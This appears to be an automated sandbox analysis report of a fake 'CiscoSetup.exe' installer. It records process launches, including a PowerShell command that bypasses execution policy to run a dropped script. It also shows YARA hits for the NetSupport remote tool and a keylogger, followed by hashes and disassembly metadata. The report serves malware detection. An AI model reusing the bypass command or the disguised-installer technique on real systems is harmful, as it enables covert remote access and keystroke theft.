                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bIjJQUOBBtGwTAxhlwWrlxt4LQ3eUYtHkDpBp9OWdk5XakPmpGvZmhIYGQURK4NWNF8rhB6AEyrINMbt3NoFkmSEI%2F0OAm5QZG4Z%2BzZVQJFuqzlEM9Kyrib6SG5vZhXtVsvSzoYqLHCmxcub"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1674&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                      Data Raw: 66 0d 0a 33 32 2e 37 37 36 37 2c 2d 39 36 2e 37 39 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: f32.7767,-96.7970


                                                                                                                                      Statistics

                                                                                                                                      CPU Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      Memory Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      High Level Behavior Distribution

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Behavior

                                                                                                                                      Click to jump to process

                                                                                                                                      System Behavior

                                                                                                                                      General

                                                                                                                                      Target ID:0
                                                                                                                                      Start time:07:11:02
                                                                                                                                      Start date:01/11/2024
                                                                                                                                      Path:C:\Users\user\Desktop\CiscoSetup.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\CiscoSetup.exe"
                                                                                                                                      Imagebase:0xe80000
                                                                                                                                      File size:16'883'280 bytes
                                                                                                                                      MD5 hash:446A85D94ADB8E2E9157170B82592D6A
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:07:11:02
                                                                                                                                      Start date:01/11/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp" /SL5="$103C8,13456411,1058304,C:\Users\user\Desktop\CiscoSetup.exe"
                                                                                                                                      Imagebase:0xc70000
                                                                                                                                      File size:3'548'672 bytes
                                                                                                                                      MD5 hash:BFD84005E52425F9B8FE658B9663E1C4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:4
                                                                                                                                      Start time:07:11:26
                                                                                                                                      Start date:01/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1"
                                                                                                                                      Imagebase:0xe40000
                                                                                                                                      File size:433'152 bytes
                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:5
                                                                                                                                      Start time:07:11:26
                                                                                                                                      Start date:01/11/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:6
                                                                                                                                      Start time:07:11:29
                                                                                                                                      Start date:01/11/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Cisco\client32.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:121'304 bytes
                                                                                                                                      MD5 hash:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.4582994339.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.4598217115.0000000005101000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000000.2403584821.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2705520820.00000000050FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:07:11:39
                                                                                                                                      Start date:01/11/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Cisco\client32.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:121'304 bytes
                                                                                                                                      MD5 hash:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000000.2495587028.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.2497690917.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.2496967852.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:10
                                                                                                                                      Start time:07:11:47
                                                                                                                                      Start date:01/11/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Cisco\client32.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:121'304 bytes
                                                                                                                                      MD5 hash:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000000.2576329982.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2577820279.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2579319799.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Disassembly

                                                                                                                                      Reset < >

                                                                                                                                        Executed Functions

                                                                                                                                        Function 08823729 Relevance: .4, Instructions: 419COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6b8c258232d64ca8c032e0832e739886e6b513d3b22c727c871ced3580ff9501
                                                                                                                                        • Instruction ID: fa1848cdc1dcfe867961df9e9b5ede15823d01eea6f2f91eddb04033778d7ba8
                                                                                                                                        • Opcode Fuzzy Hash: 6b8c258232d64ca8c032e0832e739886e6b513d3b22c727c871ced3580ff9501
                                                                                                                                        • Instruction Fuzzy Hash: 57E1AA30B046908FDB15EB39C46466EBBF6AFCA201B1485ADD546DF3A1CB34EC46CB51
                                                                                                                                        Function 08823C80 Relevance: 1.5, Strings: 1, Instructions: 250COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • YKfdhMHT+E2GS29PGdHWTJWTwcWXZYYmB6jM4A208yB0Uhm02pwkkgpE7nR12kD0IsvFgs2z0J7LRGzhY6602xWaWqE2ucpMCXXBPZ0ed0vZ3CYYYaE18RgYTFM8o4hm+Y, xrefs: 08823CC5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: YKfdhMHT+E2GS29PGdHWTJWTwcWXZYYmB6jM4A208yB0Uhm02pwkkgpE7nR12kD0IsvFgs2z0J7LRGzhY6602xWaWqE2ucpMCXXBPZ0ed0vZ3CYYYaE18RgYTFM8o4hm+Y
                                                                                                                                        • API String ID: 0-3274943833
                                                                                                                                        • Opcode ID: 1e65080cef18a68165a3f52b3c99accd4c287e8309928e0cbb8d8fa28e1b9b5e
                                                                                                                                        • Instruction ID: 3f95e8ee4d1cb3d9e68df3853a0d757d9cd6404b21d01adc8497899ba6bb12de
                                                                                                                                        • Opcode Fuzzy Hash: 1e65080cef18a68165a3f52b3c99accd4c287e8309928e0cbb8d8fa28e1b9b5e
                                                                                                                                        • Instruction Fuzzy Hash: E0918038B00714CFCB24EBB5D0685AE77F2AFC96217504A1CD416EB7A0DB349C46CB55
                                                                                                                                        Function 08823C90 Relevance: 1.5, Strings: 1, Instructions: 241COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • YKfdhMHT+E2GS29PGdHWTJWTwcWXZYYmB6jM4A208yB0Uhm02pwkkgpE7nR12kD0IsvFgs2z0J7LRGzhY6602xWaWqE2ucpMCXXBPZ0ed0vZ3CYYYaE18RgYTFM8o4hm+Y, xrefs: 08823CC5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: YKfdhMHT+E2GS29PGdHWTJWTwcWXZYYmB6jM4A208yB0Uhm02pwkkgpE7nR12kD0IsvFgs2z0J7LRGzhY6602xWaWqE2ucpMCXXBPZ0ed0vZ3CYYYaE18RgYTFM8o4hm+Y
                                                                                                                                        • API String ID: 0-3274943833
                                                                                                                                        • Opcode ID: 1a6c1386526d5c894971a3782649380d56f39c549181a8ddda5217be24005641
                                                                                                                                        • Instruction ID: 75f9284978bf405419db23788d1b31ae1ee975537b7ad2a51bfed652a29c07fe
                                                                                                                                        • Opcode Fuzzy Hash: 1a6c1386526d5c894971a3782649380d56f39c549181a8ddda5217be24005641
                                                                                                                                        • Instruction Fuzzy Hash: C7917E38B00714CFCB28EBB5D0685AE77F6AFC96217508A1CD416EB7A0DB34AC46CB55
                                                                                                                                        Function 08824180 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • YKfdhMHT+E2GS29PGdHWTJWTwcWXZYYmB6jM4A208yB0Uhm02pwkkgpE7nR12kD0IsvFgs2z0J7LRGzhY6602xWaWqE2ucpMCXXBPZ0ed0vZ3CYYYaE18RgYTFM8o4hm+Y, xrefs: 0882422F, 0882423D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: YKfdhMHT+E2GS29PGdHWTJWTwcWXZYYmB6jM4A208yB0Uhm02pwkkgpE7nR12kD0IsvFgs2z0J7LRGzhY6602xWaWqE2ucpMCXXBPZ0ed0vZ3CYYYaE18RgYTFM8o4hm+Y
                                                                                                                                        • API String ID: 0-3274943833
                                                                                                                                        • Opcode ID: f67bccf114d3f3913fc602676bda95dac47908417748094077328cce22195f91
                                                                                                                                        • Instruction ID: ffa09283a501673a652be098872e5dff36bb4cbcf98eff3e969f221b467181fe
                                                                                                                                        • Opcode Fuzzy Hash: f67bccf114d3f3913fc602676bda95dac47908417748094077328cce22195f91
                                                                                                                                        • Instruction Fuzzy Hash: D3414A753206508FC754CF79D88885ABBF5FF8961031682AAE509CB732DB71DC45CBA0
                                                                                                                                        Function 088241F8 Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • YKfdhMHT+E2GS29PGdHWTJWTwcWXZYYmB6jM4A208yB0Uhm02pwkkgpE7nR12kD0IsvFgs2z0J7LRGzhY6602xWaWqE2ucpMCXXBPZ0ed0vZ3CYYYaE18RgYTFM8o4hm+Y, xrefs: 0882422F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: YKfdhMHT+E2GS29PGdHWTJWTwcWXZYYmB6jM4A208yB0Uhm02pwkkgpE7nR12kD0IsvFgs2z0J7LRGzhY6602xWaWqE2ucpMCXXBPZ0ed0vZ3CYYYaE18RgYTFM8o4hm+Y
                                                                                                                                        • API String ID: 0-3274943833
                                                                                                                                        • Opcode ID: be0c5f45cb9ec875082f34fda138b9a54564077c1e13d4306d66bf1608067334
                                                                                                                                        • Instruction ID: 7aed4bee77f5f53155a8f7f16ca20f2b3a9ef22160ed928248bd80306fb1a7f4
                                                                                                                                        • Opcode Fuzzy Hash: be0c5f45cb9ec875082f34fda138b9a54564077c1e13d4306d66bf1608067334
                                                                                                                                        • Instruction Fuzzy Hash: 25F0A7326197915FC305867A9884495FFE5EED7310315539BE018C7522D75088858351
                                                                                                                                        Function 07686758 Relevance: .9, Instructions: 903COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2459844617.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_7680000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8e890527948cdcad711c0992c55c9dc768b609b8172475991cca4b18a47cdf67
                                                                                                                                        • Instruction ID: 25f1bc6f22c156c93b1e7f2c52293e7d9d3327c9002064259c96dcc27a7cf1cb
                                                                                                                                        • Opcode Fuzzy Hash: 8e890527948cdcad711c0992c55c9dc768b609b8172475991cca4b18a47cdf67
                                                                                                                                        • Instruction Fuzzy Hash: C65258B1B00215CFDB55AB78D8147AABBE2AFC5214F1481AAD506CF393DF36D841C7A2
                                                                                                                                        Function 08828C20 Relevance: .8, Instructions: 845COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d41fb039fc09246bb117c3a87d8a60bb2605087c7a628383c1021068e7f46a8e
                                                                                                                                        • Instruction ID: 5a1cf6ccac1484d06d7e7148105cb5be7a92999a196e00532141964ee858af27
                                                                                                                                        • Opcode Fuzzy Hash: d41fb039fc09246bb117c3a87d8a60bb2605087c7a628383c1021068e7f46a8e
                                                                                                                                        • Instruction Fuzzy Hash: B2726B34B00228CFDB14DB68C894BADBBB2BF85305F1181E9E549AB395DB359D82CF51
                                                                                                                                        Function 08827588 Relevance: .7, Instructions: 693COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c123e1537ad15274c8bb2441ef750585b77cf6ad3e74f9f8df1bde0f7dfae000
                                                                                                                                        • Instruction ID: a99f4208ac9a20b3244ced8938c72fdebc3c563dcca9434919bbb2b79c89ac90
                                                                                                                                        • Opcode Fuzzy Hash: c123e1537ad15274c8bb2441ef750585b77cf6ad3e74f9f8df1bde0f7dfae000
                                                                                                                                        • Instruction Fuzzy Hash: E8523974A01219DFDB15DFA9C484AADBBB2FF88311F248159E805EB365C735ED82CB90
                                                                                                                                        Function 076807F8 Relevance: .3, Instructions: 324COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2459844617.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_7680000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a173f32a8660df6134e0a851efb90b0ed06c8056c0c17433b9958390ff053fb3
                                                                                                                                        • Instruction ID: e622110ca8c7897dd0b7d8ed5fe45d13ce13b0f0709c9687bd6b17066a269664
                                                                                                                                        • Opcode Fuzzy Hash: a173f32a8660df6134e0a851efb90b0ed06c8056c0c17433b9958390ff053fb3
                                                                                                                                        • Instruction Fuzzy Hash: FDB11AB1B00205DFDF64AE78C44476ABBB6FF85210F148A6AD51ACB352DB31CD49C7A2
                                                                                                                                        Function 04A172C0 Relevance: .3, Instructions: 265COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2410969445.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_4a10000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4205931653b4a4b7b081eae8e9e818df1cd2b09c65a8f4a8489360768146b5ce
                                                                                                                                        • Instruction ID: 341d76b3361b716d86c42a22f98210f64a7a462fcfcbcf1e84aa9198779ac0a5
                                                                                                                                        • Opcode Fuzzy Hash: 4205931653b4a4b7b081eae8e9e818df1cd2b09c65a8f4a8489360768146b5ce
                                                                                                                                        • Instruction Fuzzy Hash: CCA18F38A01254DFCB15CFA8D4849AEBBF2FF89350F1485A9E445AB362C735ED46CB60
                                                                                                                                        Function 04A18120 Relevance: .2, Instructions: 246COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2410969445.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_4a10000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6c82268a275b2aea11a56b582cdedae8b11dd53619834c05a3fd0f640a620f5b
                                                                                                                                        • Instruction ID: 63e1494a004c7ab473c3a1745666365e576b904cbdd4d4c9eb75b4ca899e4aa3
                                                                                                                                        • Opcode Fuzzy Hash: 6c82268a275b2aea11a56b582cdedae8b11dd53619834c05a3fd0f640a620f5b
                                                                                                                                        • Instruction Fuzzy Hash: FC916A35A017148FC715DB68D484A9ABBF6FF89320F1584A9E505DB362CB39EC46CBA0
                                                                                                                                        Function 07684D10 Relevance: .2, Instructions: 216COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2459844617.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_7680000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f66c624b66b41d3cd1608e0bc0ede22dbf49b8b18cc5968abc1fbcaefa427b18
                                                                                                                                        • Instruction ID: bb637ef083f9f9a63b2f200b5e684d36bc924c1d5816fb2f83998da5b9349e37
                                                                                                                                        • Opcode Fuzzy Hash: f66c624b66b41d3cd1608e0bc0ede22dbf49b8b18cc5968abc1fbcaefa427b18
                                                                                                                                        • Instruction Fuzzy Hash: C671F5F1B00257CFCBA4AE78840476ABFA1AFC5654F14826AD507CB356EF36C941CBA1
                                                                                                                                        Function 04A12AA0 Relevance: .2, Instructions: 207COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2410969445.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_4a10000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 1940edac0af696100d77b9c74926b96e0e2119ede0f2ea8af30fb4cb4783e09d
                                                                                                                                        • Instruction ID: 073bd1d4e57c38f594420234cff107000d625a3cdd0c6db511ac686b53037a4d
                                                                                                                                        • Opcode Fuzzy Hash: 1940edac0af696100d77b9c74926b96e0e2119ede0f2ea8af30fb4cb4783e09d
                                                                                                                                        • Instruction Fuzzy Hash: B791AC74A00249CFCB15CF59C494AAEFBB1FF88310B2486A9D955AB3A5C735FC51CBA0
                                                                                                                                        Function 088245BD Relevance: .2, Instructions: 197COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f4cb33be4a9b784efc8b849df9ead6c17edc441e1131bbddcf52a4e7b287759c
                                                                                                                                        • Instruction ID: 579dfd08aca3b331f90997cff9af1e9fbe16a9805ab5c923ce57f3465de7c7a9
                                                                                                                                        • Opcode Fuzzy Hash: f4cb33be4a9b784efc8b849df9ead6c17edc441e1131bbddcf52a4e7b287759c
                                                                                                                                        • Instruction Fuzzy Hash: E3F02B759087A0CFC313A73994156A47FA0DB53616F0802AFE4A7CBE53D711944BC796
                                                                                                                                        Function 088245CD Relevance: .2, Instructions: 189COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 527267e78227f39680fce3227aa9440e34dd053512e77a5fbb7c600d1436ec17
                                                                                                                                        • Instruction ID: 74f746587d190bfd2b84c2d19a067d86d75108a3cfd1afb2297d16b7de7101b3
                                                                                                                                        • Opcode Fuzzy Hash: 527267e78227f39680fce3227aa9440e34dd053512e77a5fbb7c600d1436ec17
                                                                                                                                        • Instruction Fuzzy Hash: E3F02730608BE08FC313873D90082D4BFF0AF03215B0401DEE4A6CBB53CB25A846CB55
                                                                                                                                        Function 04A1D4E3 Relevance: .2, Instructions: 188COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2410969445.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_4a10000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
